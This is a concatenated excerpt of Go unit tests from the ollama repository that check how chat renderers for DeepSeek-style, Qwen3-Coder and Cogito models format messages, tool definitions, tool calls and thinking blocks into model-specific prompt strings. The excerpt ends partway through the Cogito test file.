Content: "I'll check the weather for you."}, {Role: "user", Content: "Actually, get Paris weather specifically"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, {Role: "tool", Content: "Paris: 22°C, Sunny"}, {Role: "assistant", Content: "The weather in Paris is great!"}, {Role: "user", Content: "What about the forecast for tomorrow?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>Tell me about the weather<|Assistant|></think>I'll check the weather for you.<|end▁of▁sentence|><|User|>Actually, get Paris weather specifically<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Paris: 22°C, Sunny<|tool▁output▁end|>The weather in Paris is great!<|end▁of▁sentence|><|User|>What about the forecast for tomorrow?<|Assistant|><think>`, }, { name: "tool call without subsequent user message - no thinking", messages: []api.Message{ {Role: "user", Content: "Get the weather"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, {Role: "tool", Content: "22°C, Sunny"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>Get the weather<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>22°C, Sunny<|tool▁output▁end|>`, }, { name: "messages with thinking content, no thinking in render", messages: []api.Message{ {Role: "user", Content: "Solve this math problem: 15 * 23"}, { Role: "assistant", Content: "The answer is 345.", Thinking: "Let me calculate 15 * 23. I can break this down: 15 * 20 = 300, and 15 * 3 = 45, so 300 + 45 = 345.", }, {Role: "user", Content: "What about 12 * 34?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Solve this math problem: 15 * 23<|Assistant|></think>The answer is 345.<|end▁of▁sentence|><|User|>What about 12 * 34?<|Assistant|></think>`, }, { name: "conversation with mix of thinking and no thinking", messages: []api.Message{ {Role: "user", Content: "Explain quantum physics"}, { Role: "assistant", Content: "Quantum physics is the study of matter and energy at the smallest scales.", Thinking: "This is a complex topic. I should start with basic concepts and avoid overwhelming technical details.", }, {Role: "user", Content: "What about photons?"}, { Role: "assistant", Content: "Photons are particles of light with no mass.", }, {Role: "user", Content: "How do they interact with matter?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>Explain quantum physics<|Assistant|></think>Quantum physics is the study of matter and energy at the smallest scales.<|end▁of▁sentence|><|User|>What about photons?<|Assistant|></think>Photons are particles of light with no mass.<|end▁of▁sentence|><|User|>How do they interact with matter?<|Assistant|><think>`, }, { name: "tool call with thinking content in response", messages: []api.Message{ {Role: "user", Content: "What's the weather in Tokyo and New York?"}, { Role: "assistant", Content: "I'll check the weather for both cities.", Thinking: "I need to call the weather API for two different cities. Let me make parallel calls.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Tokyo", }), }, }, { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "New York", }), }, }, }, }, {Role: "tool", Content: "Tokyo: 18°C, Cloudy"}, {Role: "tool", Content: "New York: 22°C, Sunny"}, { Role: "assistant", Content: "Based on the weather data: Tokyo is cloudy at 18°C, while New York is sunny at 22°C.", Thinking: "The data shows a nice contrast between the two cities. Tokyo is cooler and overcast while NYC has better weather.", }, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>What's the weather in Tokyo and New York?<|Assistant|></think>I'll check the weather for both cities.<|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Tokyo"}<|tool▁call▁end|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"New York"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Tokyo: 18°C, Cloudy<|tool▁output▁end|><|tool▁output▁begin|>New York: 22°C, Sunny<|tool▁output▁end|>Based on the weather data: Tokyo is cloudy at 18°C, while New York is sunny at 22°C.<|end▁of▁sentence|>`, }, { name: "empty thinking field", messages: []api.Message{ {Role: "user", Content: "Simple question"}, { Role: "assistant", Content: "Simple answer.", Thinking: "", // Empty thinking content }, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>Simple question<|Assistant|></think>Simple answer.<|end▁of▁sentence|>`, }, { name: "with tools definitions", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "What's the weather like?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather information", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are a helpful assistant. ## Tools You have access to the following tools: ### get_weather Description: Get current weather information Parameters: {"type":"object","required":["location"],"properties":{"location":{"type":"string","description":"City name"}}} IMPORTANT: ALWAYS adhere to this exact format for tool use: <|tool▁calls▁begin|><|tool▁call▁begin|>tool_call_name<|tool▁sep|>tool_call_arguments<|tool▁call▁end|>{{additional_tool_calls}}<|tool▁calls▁end|> Where: - ` + "`tool_call_name`" + ` must be an exact match to one of the available tools - ` + "`tool_call_arguments`" + ` must be valid JSON that strictly follows the tool's Parameters Schema - For multiple tool calls, chain them directly without separators or spaces <|User|>What's the weather like?<|Assistant|></think>`, }, { name: "tools definitions with thinking enabled", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "What's the weather in Paris?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather information", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>You are a helpful assistant. ## Tools You have access to the following tools: ### get_weather Description: Get current weather information Parameters: {"type":"object","required":["location"],"properties":{"location":{"type":"string","description":"City name"}}} IMPORTANT: ALWAYS adhere to this exact format for tool use: <|tool▁calls▁begin|><|tool▁call▁begin|>tool_call_name<|tool▁sep|>tool_call_arguments<|tool▁call▁end|>{{additional_tool_calls}}<|tool▁calls▁end|> Where: - ` + "`tool_call_name`" + ` must be an exact match to one of the available tools - ` + "`tool_call_arguments`" + ` must be valid JSON that strictly follows the tool's Parameters Schema - For multiple tool calls, chain them directly without separators or spaces <|User|>What's the weather in Paris?<|Assistant|><think>`, }, { name: "tools definitions with actual tool call", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather information", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are a helpful assistant. ## Tools You have access to the following tools: ### get_weather Description: Get current weather information Parameters: {"type":"object","required":["location"],"properties":{"location":{"type":"string","description":"City name"}}} IMPORTANT: ALWAYS adhere to this exact format for tool use: <|tool▁calls▁begin|><|tool▁call▁begin|>tool_call_name<|tool▁sep|>tool_call_arguments<|tool▁call▁end|>{{additional_tool_calls}}<|tool▁calls▁end|> Where: - ` + "`tool_call_name`" + ` must be an exact match to one of the available tools - ` + "`tool_call_arguments`" + ` must be valid JSON that strictly follows the tool's Parameters Schema - For multiple tool calls, chain them directly without separators or spaces <|User|>What's the weather in Paris?<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|>`, }, { name: "tools definitions with full conversation cycle", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", Content: "I'll check the weather for you.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, {Role: "tool", Content: "Temperature: 22°C, Sunny"}, {Role: "assistant", Content: "The weather in Paris is 22°C and sunny!"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather information", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are a helpful assistant. ## Tools You have access to the following tools: ### get_weather Description: Get current weather information Parameters: {"type":"object","required":["location"],"properties":{"location":{"type":"string","description":"City name"}}} IMPORTANT: ALWAYS adhere to this exact format for tool use: <|tool▁calls▁begin|><|tool▁call▁begin|>tool_call_name<|tool▁sep|>tool_call_arguments<|tool▁call▁end|>{{additional_tool_calls}}<|tool▁calls▁end|> Where: - ` + "`tool_call_name`" + ` must be an exact match to one of the available tools - ` + "`tool_call_arguments`" + ` must be valid JSON that strictly follows the tool's Parameters Schema - For multiple tool calls, chain them directly without separators or spaces <|User|>What's the weather in Paris?<|Assistant|></think>I'll check the weather for you.<|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Temperature: 22°C, Sunny<|tool▁output▁end|>The weather in Paris is 22°C and sunny!<|end▁of▁sentence|>`, }, { name: "tools with thinking and full conversation", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Check the weather in Tokyo"}, { Role: "assistant", Thinking: "The user wants weather info for Tokyo. I should use the get_weather tool.", Content: "Let me check that for you.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Tokyo", }), }, }, }, }, {Role: "tool", Content: "Temperature: 18°C, Cloudy"}, { Role: "assistant", Thinking: "The weather data shows it's cloudy and cool. I should present this clearly.", Content: "In Tokyo, it's currently 18°C and cloudy.", }, {Role: "user", Content: "What about London?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather information", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>You are a helpful assistant. ## Tools You have access to the following tools: ### get_weather Description: Get current weather information Parameters: {"type":"object","required":["location"],"properties":{"location":{"type":"string","description":"City name"}}} IMPORTANT: ALWAYS adhere to this exact format for tool use: <|tool▁calls▁begin|><|tool▁call▁begin|>tool_call_name<|tool▁sep|>tool_call_arguments<|tool▁call▁end|>{{additional_tool_calls}}<|tool▁calls▁end|> Where: - ` + "`tool_call_name`" + ` must be an exact match to one of the available tools - ` + "`tool_call_arguments`" + ` must be valid JSON that strictly follows the tool's Parameters Schema - For multiple tool calls, chain them directly without separators or spaces <|User|>Check the weather in Tokyo<|Assistant|></think>Let me check that for you.<|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Tokyo"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Temperature: 18°C, Cloudy<|tool▁output▁end|>In Tokyo, it's currently 18°C and cloudy.<|end▁of▁sentence|><|User|>What about London?<|Assistant|><think>`, }, { name: "multiple tools definitions", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant with access to multiple tools."}, {Role: "user", Content: "What can you help me with?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather information", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, { Type: "function", Function: api.ToolFunction{ Name: "calculate", Description: "Perform mathematical calculations", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "expression": { Type: api.PropertyType{"string"}, Description: "Mathematical expression to evaluate", }, }), Required: []string{"expression"}, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are a helpful assistant with access to multiple tools. ## Tools You have access to the following tools: ### get_weather Description: Get current weather information Parameters: {"type":"object","required":["location"],"properties":{"location":{"type":"string","description":"City name"}}} ### calculate
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
true
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/qwen3coder_test.go
model/renderers/qwen3coder_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestQwen3CoderRenderer(t *testing.T) { tests := []struct { name string msgs []api.Message tools []api.Tool expected string }{ { name: "basic", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello, how are you?"}, }, expected: `<|im_start|>system You are a helpful assistant.<|im_end|> <|im_start|>user Hello, how are you?<|im_end|> <|im_start|>assistant `, }, { name: "with tools and response", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant with access to tools."}, {Role: "user", Content: "What is the weather like in San Francisco?"}, { Role: "assistant", Content: "I'll check the weather in San Francisco for you.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "unit": "fahrenheit", }), }, }, }, }, {Role: "tool", Content: "{\"location\": \"San Francisco, CA\", \"temperature\": 68, \"condition\": \"partly cloudy\", \"humidity\": 65, \"wind_speed\": 12}", ToolName: "get_weather"}, {Role: "user", Content: "That sounds nice! What about New York?"}, }, tools: []api.Tool{ {Function: api.ToolFunction{ Name: "get_weather", Description: "Get the current weather in a given location", Parameters: api.ToolFunctionParameters{ Required: []string{"unit"}, Properties: testPropsMap(map[string]api.ToolProperty{ "unit": {Type: api.PropertyType{"string"}, Enum: []any{"celsius", "fahrenheit"}, Description: "The unit of temperature"}, // TODO(drifkin): add multiple params back once we have predictable // order via some sort of ordered map type (see // <https://github.com/ollama/ollama/issues/12244>) /* "location": {Type: api.PropertyType{"string"}, Description: "The city and state, e.g. San Francisco, CA"}, */ }), }, }}, }, expected: `<|im_start|>system You are a helpful assistant with access to tools. # Tools You have access to the following functions: <tools> <function> <name>get_weather</name> <description>Get the current weather in a given location</description> <parameters> <parameter> <name>unit</name> <type>string</type> <description>The unit of temperature</description> <enum>["celsius","fahrenheit"]</enum> </parameter> <required>["unit"]</required> </parameters> </function> </tools> If you choose to call a function ONLY reply in the following format with NO suffix: <tool_call> <function=example_function_name> <parameter=example_parameter_1> value_1 </parameter> <parameter=example_parameter_2> This is the value for the second parameter that can span multiple lines </parameter> </function> </tool_call> <IMPORTANT> Reminder: - Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags - Required parameters MUST be specified - You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after - If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls </IMPORTANT><|im_end|> <|im_start|>user What is the weather like in San Francisco?<|im_end|> <|im_start|>assistant I'll check the weather in San Francisco for you. <tool_call> <function=get_weather> <parameter=unit> fahrenheit </parameter> </function> </tool_call><|im_end|> <|im_start|>user <tool_response> {"location": "San Francisco, CA", "temperature": 68, "condition": "partly cloudy", "humidity": 65, "wind_speed": 12} </tool_response> <|im_end|> <|im_start|>user That sounds nice! What about New York?<|im_end|> <|im_start|>assistant `, }, { name: "parallel tool calls", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant with access to tools."}, {Role: "user", Content: "call double(1) and triple(2)"}, {Role: "assistant", Content: "I'll call double(1) and triple(2) for you.", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "double", Arguments: testArgs(map[string]any{"number": "1"})}}, {Function: api.ToolCallFunction{Name: "triple", Arguments: testArgs(map[string]any{"number": "2"})}}, }}, {Role: "tool", Content: "{\"number\": 2}", ToolName: "double"}, {Role: "tool", Content: "{\"number\": 6}", ToolName: "triple"}, }, tools: []api.Tool{ {Function: api.ToolFunction{Name: "double", Description: "Double a number", Parameters: api.ToolFunctionParameters{Properties: testPropsMap(map[string]api.ToolProperty{ "number": {Type: api.PropertyType{"string"}, Description: "The number to double"}, })}}}, {Function: api.ToolFunction{Name: "triple", Description: "Triple a number", Parameters: api.ToolFunctionParameters{Properties: testPropsMap(map[string]api.ToolProperty{ "number": {Type: api.PropertyType{"string"}, Description: "The number to triple"}, })}}}, }, expected: `<|im_start|>system You are a helpful assistant with access to tools. # Tools You have access to the following functions: <tools> <function> <name>double</name> <description>Double a number</description> <parameters> <parameter> <name>number</name> <type>string</type> <description>The number to double</description> </parameter> </parameters> </function> <function> <name>triple</name> <description>Triple a number</description> <parameters> <parameter> <name>number</name> <type>string</type> <description>The number to triple</description> </parameter> </parameters> </function> </tools> If you choose to call a function ONLY reply in the following format with NO suffix: <tool_call> <function=example_function_name> <parameter=example_parameter_1> value_1 </parameter> <parameter=example_parameter_2> This is the value for the second parameter that can span multiple lines </parameter> </function> </tool_call> <IMPORTANT> Reminder: - Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags - Required parameters MUST be specified - You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after - If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls </IMPORTANT><|im_end|> <|im_start|>user call double(1) and triple(2)<|im_end|> <|im_start|>assistant I'll call double(1) and triple(2) for you. <tool_call> <function=double> <parameter=number> 1 </parameter> </function> </tool_call> <tool_call> <function=triple> <parameter=number> 2 </parameter> </function> </tool_call><|im_end|> <|im_start|>user <tool_response> {"number": 2} </tool_response> <tool_response> {"number": 6} </tool_response> <|im_end|> <|im_start|>assistant `, }, { name: "prefill", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Tell me something interesting."}, {Role: "assistant", Content: "I'll tell you something interesting about cats"}, }, expected: `<|im_start|>system You are a helpful assistant.<|im_end|> <|im_start|>user Tell me something interesting.<|im_end|> <|im_start|>assistant I'll tell you something interesting about cats`, }, { name: "complex tool call arguments should remain json encoded", msgs: []api.Message{ {Role: "user", Content: "call tool"}, {Role: "assistant", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{ Name: "echo", Arguments: testArgs(map[string]any{ "payload": map[string]any{"foo": "bar"}, }), }}, }}, {Role: "tool", Content: "{\"payload\": {\"foo\": \"bar\"}}", ToolName: "echo"}, }, expected: `<|im_start|>user call tool<|im_end|> <|im_start|>assistant <tool_call> <function=echo> <parameter=payload> {"foo":"bar"} </parameter> </function> </tool_call><|im_end|> <|im_start|>user <tool_response> {"payload": {"foo": "bar"}} </tool_response> <|im_end|> <|im_start|>assistant `, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { rendered, err := (&Qwen3CoderRenderer{}).Render(tt.msgs, tt.tools, nil) if err != nil { t.Fatal(err) } if diff := cmp.Diff(rendered, tt.expected); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } }) } } func TestFormatToolCallArgument(t *testing.T) { tests := []struct { name string arg any expected string }{ { name: "string", arg: "foo", // notice no quotes around the string expected: "foo", }, { name: "map", arg: map[string]any{"foo": "bar"}, expected: "{\"foo\":\"bar\"}", }, { name: "number", arg: 1, expected: "1", }, { name: "boolean", arg: true, expected: "true", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { got := formatToolCallArgument(tt.arg) if got != tt.expected { t.Errorf("formatToolCallArgument(%v) = %v, want %v", tt.arg, got, tt.expected) } }) } } func TestQwen3ToolDefinitionTypes(t *testing.T) { tests := []struct { name string propertyType api.PropertyType expected string }{ { name: "simple", propertyType: api.PropertyType{"string"}, expected: "string", }, { name: "multiple", propertyType: api.PropertyType{"string", "number"}, expected: "[\"string\",\"number\"]", }, { name: "empty", propertyType: api.PropertyType{}, expected: "[]", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { got := formatToolDefinitionType(tt.propertyType) if got != tt.expected { t.Errorf("formatToolDefinitionType() = %v, want %v", got, tt.expected) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/cogito_test.go
model/renderers/cogito_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestCogitoRenderer(t *testing.T) { tests := []struct { name string messages []api.Message tools []api.Tool thinkValue *api.ThinkValue expected string }{ { name: "basic user message", messages: []api.Message{ {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello, how are you?<|Assistant|>`, }, { name: "basic with system message", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. You are a helpful assistant.<|User|>Hello, how are you?<|Assistant|>`, }, { name: "conversation with assistant response", messages: []api.Message{ {Role: "user", Content: "What is the capital of France?"}, {Role: "assistant", Content: "The capital of France is Paris."}, {Role: "user", Content: "Fantastic!"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>What is the capital of France?<|Assistant|>The capital of France is Paris.<|end▁of▁sentence|><|User|>Fantastic!<|Assistant|>`, }, { name: "thinking enabled without system", messages: []api.Message{ {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello, how are you?<|Assistant|><think> `, }, { name: "thinking enabled with system", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. You are a helpful assistant. <|User|>Hello, how are you?<|Assistant|><think> `, }, { name: "thinking disabled", messages: []api.Message{ {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello, how are you?<|Assistant|>`, }, { name: "with tools", messages: []api.Message{ {Role: "user", Content: "What's the weather like?"}, }, thinkValue: &api.ThinkValue{Value: false}, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, }, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. You have the following functions available: ` + "```json\n" + `{ "type": "function", "function": { "name": "get_weather", "description": "Get current weather", "parameters": { "type": "object", "required": [ "location" ], "properties": { "location": { "type": "string", "description": "City name" } } } } } ` + "```\n" + `<|User|>What's the weather like?<|Assistant|>`, }, { name: "assistant with tool calls", messages: []api.Message{ {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", Content: "I'll check the weather in Paris for you.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>What's the weather in Paris?<|Assistant|>I'll check the weather in Paris for you.<|tool▁calls▁begin|><|tool▁call▁begin|>function<|tool▁sep|>get_weather ` + "```json\n" + `{"location":"Paris"} ` + "```" + `<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|Assistant|>`, }, { name: "tool response", messages: []api.Message{ {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, {Role: "tool", Content: "Temperature: 22°C, Sunny"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>What's the weather in Paris?<|Assistant|><|tool▁calls▁begin|><|tool▁call▁begin|>function<|tool▁sep|>get_weather ` + "```json\n" + `{"location":"Paris"} ` + "```" + `<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁outputs▁begin|><|tool▁output▁begin|>Temperature: 22°C, Sunny<|tool▁output▁end|><|tool▁outputs▁end|><|Assistant|>`, }, { name: "multiple tool responses", messages: []api.Message{ {Role: "user", Content: "Get weather for Paris and London"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "London", }), }, }, }, }, {Role: "tool", Content: "Paris: 22°C, Sunny"}, {Role: "tool", Content: "London: 18°C, Cloudy"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Get weather for Paris and London<|Assistant|><|tool▁calls▁begin|><|tool▁call▁begin|>function<|tool▁sep|>get_weather ` + "```json\n" + `{"location":"Paris"} ` + "```" + `<|tool▁call▁end|> <|tool▁call▁begin|>function<|tool▁sep|>get_weather ` + "```json\n" + `{"location":"London"} ` + "```" + `<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁outputs▁begin|><|tool▁output▁begin|>Paris: 22°C, Sunny<|tool▁output▁end|> <|tool▁output▁begin|>London: 18°C, Cloudy<|tool▁output▁end|><|tool▁outputs▁end|><|Assistant|>`, }, { name: "thinking with tools", messages: []api.Message{ {Role: "user", Content: "What's the weather like?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. You have the following functions available: ` + "```json\n" + `{ "type": "function", "function": { "name": "get_weather", "description": "Get current weather", "parameters": { "type": "object", "required": [ "location" ], "properties": { "location": { "type": "string", "description": "City name" } } } } } ` + "```\n" + `<|User|>What's the weather like?<|Assistant|><think> `, }, // test cases based on cogito { name: "single_turn_thinking_false", messages: []api.Message{ {Role: "user", Content: "Hello"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello<|Assistant|>`, }, { name: "single_turn_thinking_true", messages: []api.Message{ {Role: "user", Content: "Hello"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello<|Assistant|><think> `, }, { name: "multi_turn_thinking_false", messages: []api.Message{ {Role: "user", Content: "Hello"}, {Role: "assistant", Content: "Hi there!"}, {Role: "user", Content: "How are you?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello<|Assistant|>Hi there!<|end▁of▁sentence|><|User|>How are you?<|Assistant|>`, }, { name: "multi_turn_thinking_true", messages: []api.Message{ {Role: "user", Content: "Hello"}, {Role: "assistant", Content: "Hi there!"}, {Role: "user", Content: "How are you?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. You are Cogito, an 